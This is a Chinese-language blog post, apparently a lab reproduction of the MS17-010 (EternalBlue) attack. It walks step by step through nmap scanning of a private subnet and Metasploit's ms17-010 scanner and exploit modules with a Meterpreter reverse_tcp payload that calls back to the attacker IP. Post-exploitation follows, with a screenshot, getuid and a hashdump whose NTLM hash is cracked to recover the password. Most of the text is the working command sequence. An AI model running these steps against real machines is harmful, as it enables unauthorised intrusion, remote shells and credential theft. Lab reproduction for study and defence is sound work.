MS17-010渗透攻击复现

子怡 发布于 2023-06-04 112 次阅读


AI 摘要

进行MS17-010渗透攻击的过程可分为以下几个步骤:收集目标网段情况,扫描目标机器,启动Metasploit,搜索漏洞ms-17-010,扫描主机,使用攻击模块设置攻击载荷,设置目标和攻击方IP,执行攻击并进行后渗透操作,获取用户名及密码。在攻击成功后,可以执行screenshot进行屏幕截图,以及进行hashdump获得密码,最终成功获取密码12345678。

1、收集目标网段下的情况

nmap 192.168.23.0/24

这里可以得知目标机器(192.168.23.135)在线

2、扫描目标机器情况

nmap 192.168.23.135 -sV -sS

这里可以得知目标机器开放了445等端口

3、启动Metasploit

msfconsle

4、搜索漏洞ms-17-010

msf6 > search ms17-010

可以看见0、1、4为攻击模块,2、3为扫描模块

5、使用扫描模块扫描主机

msf6 > use 3

可以发现RHOST没有填写,补充填写

set rhost 192.168.23.135

6、开始扫描

run

好像存在漏洞

7、使用攻击模块,设置攻击载荷

use 0
set payload windows/x64/meterpreter/reverse_tcp

8、设置目标,设置攻击方IP

set rhost 192.168.23.135
set lhost 192.168.23.131

9、开始攻击

run

攻击成功

10、后渗透

执行screeshot

screenshot

成功

执行shell,获取用户名及密码(hashdump)

getuid
hashdump

NTLM解密后得到密码12345678